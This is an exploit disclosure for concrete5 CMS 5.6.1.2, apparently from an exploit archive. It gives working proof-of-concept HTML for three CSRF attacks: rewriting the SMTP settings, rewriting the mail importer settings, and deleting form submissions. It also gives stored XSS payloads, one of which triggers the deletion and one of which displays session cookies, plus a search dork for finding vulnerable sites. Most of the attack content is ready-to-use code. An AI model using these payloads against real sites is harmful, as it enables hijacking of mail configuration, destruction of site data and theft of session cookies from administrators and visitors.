============================================================= __ __ _ ___ _ __ ____ \ \ / / | | / _ \ (_) /_ | |___ \ ___ \ V / _ __ | | | | | | _ | | __) | _ __ / _ \ > < | '_ \ | | | | | | | | | | |__ < | '__| | __/ / . \ | |_) | | | | |_| | | | | | ___) | | | \___| /_/ \_\ | .__/ |_| \___/ |_| |_| |____/ |_| | | |_| blackpentesters.blogspot.com ============================================================= ########################################################################################### # Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities] # # Date: [2013-6-9] # # Exploit Author: [expl0i13r] # # Vendor Homepage: [http://www.concrete5.org/] # # Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/] # # Version: [5.6.1.2] # # Goole Dork: [Built with concrete5 - an open source CMS] # # Tested on: [Windows] # # Contact: expl0i13r@gmail.com # ########################################################################################### Summary: ======== 1. CSRF (Modify SMTP Settings) 2. CSRF (Modify Mail Importers Settings) 3. CSRF (Delete Form Results) 4. Stored XSS 1. CSRF (Modify SMTP Settings): ================================ concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities one of which allow an attacker to modify "SMTP Settings" and "Send Mail Method" available at below URL : Affected URL: -------------- http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/ ---------------------------------------------------------------------------------------- Note: Below code collects form details,send and update it, when Victim loads this page ---------------------------------------------------------------------------------------- <html> <head> <script type="text/javascript" language="javascript"> function submitform() { document.getElementById('myForm').submit(); } </script> </head> <body> <form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form" original-class="form-horizontal"> <input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked> <input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text"> <input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text"> <input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text"> <select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" ccm-passed-value="SSL" class="ccm-input-select"> <option value="">None</option> <option value="SSL" selected="selected">SSL</option> <option value="TLS">TLS</option></select> <input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text"> </form> <script type="text/javascript" language="javascript"> document.myForm.submit() </script> </body> </html> 2. CSRF (Modify Mail Importer Settings) ========================================= Below code exploits CSRF vulnerability which allows attacker to Edit and update "Importer Settings" details. Affected URL : --------------- http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/ ---------------------------------------------------------------------------------------- Note: Below code collects form details,send and update them, when Victim loads this page ---------------------------------------------------------------------------------------- <html> <head> <script type="text/javascript" language="javascript"> function submitform() { document.getElementById('myForm').submit(); } </script> </head> <body> <form name = "myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/" original-class="form-horizontal"> <input type="hidden" name="miID" id="miID" value="1"> <input id="miEmail" type="text" name="miEmail" value="exploiter"> <input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text"> <input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text"> <input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text"> <input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text"> <select name="miEncryption" id="miEncryption" ccm-passed-value="" class="ccm-input-select"> <option value="" selected="selected">None</option> </select> <select name="miIsEnabled" id="miIsEnabled" ccm-passed-value="1" class="ccm-input-select"> <option value="1" selected="selected">Yes</option> </select> <select name="miConnectionMethod" id="miConnectionMethod" ccm-passed-value="POP" class="ccm-input-select"> <option value="POP" selected="selected">POP</option> </select> <script type="text/javascript" language="javascript"> document.myForm.submit() </script> </body> </html> 3. CSRF (Delete Form Results) =============================== Each Submissions available at "REPORTS" > "Form Results" page has static "qsID" assigned, using which attacker can delete submissions. Ex. --- When we install this CMS, "Contact Us" form by default available at URL : http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/ For above "Contact Form", qsID in my case is "1370626098", which can be found at url: -------------------------------------------------------------------------------------- http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/ -------------------------------------------------------------------------------------- <a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a> ------------------------------------------------------------------------------------------------------ In order to exploit this CSRF, attacker must have "qsID" values, for which attacker needs to have at least Limited access to CMS. Steps: ------ 1. Attacker logs in to CMS 2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/" 3. Gets Static "qsID" value from source code 4. Use "qsID" to create below CSRF exploit Code: ------- <html> <head> <script> function delete() { # Delete Submissins "Contact Us" page window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers") } </script> </head> <body onload="delete()"> </body> </html> 4. Multiple Stored XSS ======================= concrete5 CMS also suffers from Stored XSS vulnerability, which can be used to "Delete Form Results" everytime page is loaded. Stored XSS-1 ============ URL: ---- http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/ Vulnerable Parameter: ---------------------- <input type="text" name="gName" class="span6" value="" id="acpro_inp2"> XSS-CSRF Payload: ------------------ "><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script> Stored XSS-2: ============= URL: ----- http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/ Vulnerable Parameter: ---------------------- <input id="asName" type="text" name="asName" value="" class="ccm-input-text"> Payload: --------- "><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script> ################################## # eXpl0i13r # # ------------------------------ # #|blackpentesters.blogspot.com |# #|infotech-knowledge.blogspot.in|# # ------------------------------ # ##################################Брой прочитания на тази страница: 1148
concrete5 CMS 5.6.1.2 – Multiple Vulnerabilities